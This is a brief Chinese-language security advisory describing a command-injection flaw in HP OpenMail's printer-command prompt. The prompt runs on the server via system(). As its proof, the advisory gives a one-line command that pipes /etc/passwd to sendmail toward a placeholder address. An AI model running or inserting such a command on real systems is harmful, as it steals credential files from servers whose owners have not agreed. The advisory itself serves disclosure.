HP的OpenMail软件存在安全漏洞发布时间:2000-05-03 更新时间:2001-05-03 严重程度:中 威胁程度:远程非授权文件存取 错误类型:设计错误 利用方式:服务器模式 受影响系统 Any HP 9000 series 700/800 systems running OpenMail详细描述 HP的OPENMAIL 系统是HP9000工作站的一个工具包,是作为一个客户端(Omgui),在Ongui中,你如果从菜单上选择option-printer... ,你将会得到一打印命令的提示,默认的是这样的类型lp -dlaser4si, 此命令将在服务器端执行,并使用了system()调用,这意味着任何MAIL 用户可以在MAIL服务器上执行任意SHELL命令,如: cat /etc/passwd | /usr/lib/sendmail your@address 将会打印出一条信息,并得到一拷贝的PASSWORD文件。 测试代码 见描述部分。 解决方案 升级 相关信息 |
